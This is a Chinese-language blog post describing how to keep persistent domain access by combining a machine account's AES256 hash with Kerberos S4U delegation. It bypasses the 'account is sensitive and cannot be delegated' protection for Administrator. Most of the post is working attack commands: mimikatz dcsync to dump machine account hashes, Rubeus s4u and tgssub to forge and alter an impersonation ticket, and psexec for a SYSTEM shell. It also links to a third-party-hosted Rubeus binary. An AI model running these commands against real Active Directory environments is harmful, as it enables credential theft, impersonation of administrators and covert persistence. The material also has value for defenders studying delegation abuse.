利用主机账户的aes256结合委派攻击来进行权限维持

喜欢ヅ旅行 2023-01-02 04:23 130阅读 0赞

### 文章目录 ###

*  1. 前言
 *  2. 实现
 *   *  1.配置了敏感账户不可被委派的效果
     *  2.绕过
     *  3. 分步解释
 *  3. 参考文章

# 1. 前言 #

主机账户的hash一般不会被改变，我们可以保留其aes256的hash然后可以结合委派攻击来进行权限维持，但当高权限用户例如admin被配置成了敏感账户的话，一般是不能进行委派的，我们今天讨论的主题就是绕过这种配置并利用。

# 2. 实现 #

## 1.配置了敏感账户不可被委派的效果 ##

先将域控账户administrator设置为不可委派：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]

Rubeus.exe hash /user:evilsystem /password:evil /domain:test.com   
    Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:Administrator /msdsspn:cifs/win /ptt
    dir \\win\c$

发现了s4u2proxy阶段失败。确定了配置敏感账户后起了作用。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]

如果将敏感账户取消掉，就会显示s4u2proxy阶段成功且可以访问win\\c$：

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]

## 2.绕过 ##

条件：知道受害者主机的`主机账户的密码`

> 使用mimikazi中的：`lsadump::dcsync /domain:test.com /user:yukong$`可以获得主机账户的各种密码。

先将域控administrator加入到受保护的用户组，然后再将其配置成敏感账户，确保不能被委派且s4u2proxy阶段失败。

[rubeus下载地址][rubeus]

Rubeus.exe s4u /user:yukong$ /aes256:a21899cd7cd3b79e204491f0bd457c36e6ef05d78e81fc836570f9e69203167e /impersonateuser:Administrator /msdsspn:cifs/yukong /outfile:1.kirbi
    rename 1_Administrator_to_yukong$@TEST.COM.kirbi 1.kirbi
    Rubeus.exe describe /ticket:1.kirbi
    Rubeus.exe tgssub /ticket:1.kirbi /altservice:cifs/yukong /ptt
    Rubeus.exe tgssub /ticket:1.kirbi /altservice:host/yukong /ptt
    psexec.exe \\yukong -s cmd

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]

## 3. 分步解释 ##

上述命令的作用是用yukong$这个账户声称自己是administrator来访问cifs/yukong服务。这时候一定会经历s4u2self与s4u2proxy两个阶段，且由于administrator被设置成了敏感用户，s4u2proxy阶段一定会失败。但是这时候我们可以导出票据，这个票据是s4u2self阶段结束后我们所拥有的票据。  
我们使用`Rubeus.exe describe /ticket:1.kirbi`查看导出的票据的具体情况

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]  
这是一张认证成功的票据，我们发现这张票据的权限是administrator，这时候我们只需要更改票据中的servicename即可访问这台主机上的其他服务，`se4u2self阶段就是获得一个访问自身的票据`，因此我们拥有更改这张票据的所有数据且可以进行更改，不过这张票据只能用来访问目标主机的服务，不能访问其他主机的服务，如上图，就只能访问yukong这台主机的服务。

Rubeus.exe tgssub /ticket:1.kirbi /altservice:cifs/yukong /ptt
    Rubeus.exe tgssub /ticket:1.kirbi /altservice:host/yukong /ptt

上面这条命令就是更改servicename或者说spn然后将票据导入内存。

--------------------

补充：机器账号的hash也可以直接进行pth攻击，域控机器账号具有dcsync权限。

# 3. 参考文章 #

[域渗透——基于资源的约束委派利用][Link 1]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221120/4bba87648b434ff186c7fb032b7f380d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221120/895e26aa30d945d3b55439395e1a65d4.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221120/47acaafc073d4adca67275af85865c62.png
[rubeus]: https://github.com/shanfenglan/test/blob/master/Rubeus.exe
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221120/bb25375500d24d7c86184cee51a7d037.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221120/cb1141046c494b29be68723838eaa14e.png
[Link 1]: https://xz.aliyun.com/t/7454?accounttraceid=f7abba17875f4128bd921365242593a7giku#toc-3